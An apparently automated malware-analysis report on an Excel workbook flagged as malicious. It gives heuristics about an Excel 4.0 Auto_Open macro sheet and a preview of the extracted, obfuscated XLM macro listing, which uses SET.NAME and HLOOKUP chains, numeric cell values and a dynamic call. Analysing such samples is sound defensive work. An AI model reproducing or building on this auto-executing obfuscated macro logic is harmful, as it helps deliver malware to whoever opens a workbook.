MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6651 bytes |
SHA-256: b17301d59297484ad039ee65099ef2bb2d699ea9ecd7330582323d9395fd9438 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - sOkUMa
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I154
' 0018 20 LABEL : Cell Value, String Constant - blHiW len=0
' 0018 24 LABEL : Cell Value, String Constant - fuYOkOIss len=0
' 0018 23 LABEL : Cell Value, String Constant - gtAIMDIF len=0
' 0018 22 LABEL : Cell Value, String Constant - iXBmnjT len=0
' 0018 20 LABEL : Cell Value, String Constant - IxrMJ len=0
' 0018 20 LABEL : Cell Value, String Constant - ltHig len=0
' 0018 25 LABEL : Cell Value, String Constant - lUfZYqByKa len=0
' 0018 21 LABEL : Cell Value, String Constant - OjHAok len=0
' 0018 21 LABEL : Cell Value, String Constant - oWCwZB len=0
' 0018 27 LABEL : Cell Value, String Constant - pEbCKMEFYSTz len=0
' 0018 20 LABEL : Cell Value, String Constant - qPXxs len=0
' 0018 27 LABEL : Cell Value, String Constant - RhWIsZnAgCAM len=0
' 0018 27 LABEL : Cell Value, String Constant - RpTzpNiweivC len=0
' 0018 20 LABEL : Cell Value, String Constant - sLdjs len=0
' 0018 24 LABEL : Cell Value, String Constant - TBxyisaDj len=0
' 0018 25 LABEL : Cell Value, String Constant - ubgLKmtFpk len=0
' 0018 23 LABEL : Cell Value, String Constant - ujqaKOvT len=0
' 0018 26 LABEL : Cell Value, String Constant - ulYNKiTJIFq len=0
' 0018 23 LABEL : Cell Value, String Constant - WAXdnUeM len=0
' 0018 27 LABEL : Cell Value, String Constant - wgDOcOslLLVQ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' sOkUMa,I63,"SET.NAME("IxrMJ",0+VALUE("0"))",""
' sOkUMa,I68,"SET.NAME("OjHAok",IxrMJ)",""
' sOkUMa,I71,"SET.NAME("wgDOcOslLLVQ",IxrMJ)",""
' sOkUMa,I73,"SET.NAME("ujqaKOvT",COUNTA(pEbCKMEFYSTz))",""
' sOkUMa,I76,"SET.NAME("lUfZYqByKa",COUNTA(iXBmnjT))",""
' sOkUMa,Q76,"",522.00000000000000000000
' sOkUMa,Q77,"",-244.00000000000000000000
' sOkUMa,Q78,"",870.00000000000000000000
' sOkUMa,I79,[],""
' sOkUMa,Q79,"",693.00000000000000000000
' sOkUMa,Q80,"",837.00000000000000000000
' sOkUMa,Q81,"",-271.00000000000000000000
' sOkUMa,I84,"SET.NAME("WAXdnUeM","")",""
' sOkUMa,I87,"OjHAok",""
' sOkUMa,I91,"SET.NAME("ulYNKiTJIFq",HLOOKUP("*",pEbCKMEFYSTz,OjHAok,FALSE))",""
' sOkUMa,I96,"ltHig",""
' sOkUMa,I99,"SET.NAME("fuYOkOIss",IxrMJ)",""
' sOkUMa,I104,[],""
' sOkUMa,I106,"fuYOkOIss",""
' sOkUMa,I110,"oWCwZB",""
' sOkUMa,I112,"sLdjs",""
' sOkUMa,I114,"RpTzpNiweivC",""
' sOkUMa,I118,"SET.NAME("TBxyisaDj",VALUE(HLOOKUP("*",iXBmnjT,RpTzpNiweivC,FALSE)))",""
' sOkUMa,I122,"gtAIMDIF",""
' sOkUMa,I126,"WAXdnUeM",""
' sOkUMa,I129,"wgDOcOslLLVQ",""
' sOkUMa,I131,NEXT(),""
' sOkUMa,I134,"blHiW",""
' sOkUMa,I138,[],""
' sOkUMa,I141,"qPXxs",""
' sOkUMa,I144,NEXT(),""
' sOkUMa,I149,RETURN(),""
' sOkUMa,I183,"SET.NAME("ubgLKmtFpk",I63)",""
' sOkUMa,I186,"pEbCKMEFYSTz",""
' sOkUMa,I191,"SET.NAME("iXBmnjT",R89C15)",""
' sOkUMa,I196,"SET.NAME("qPXxs",202)",""
' sOkUMa,I198,"SET.NAME("RhWIsZnAgCAM",9)",""
' sOkUMa,I201,ubgLKmtFpk(),""
' sOkUMa,I202,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.